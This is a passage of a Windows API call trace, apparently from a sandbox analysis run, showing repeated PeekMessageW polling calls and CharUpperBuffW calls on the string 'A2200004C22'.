wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.305] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.306] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.307] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.310] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.315] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.316] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.317] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.318] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] 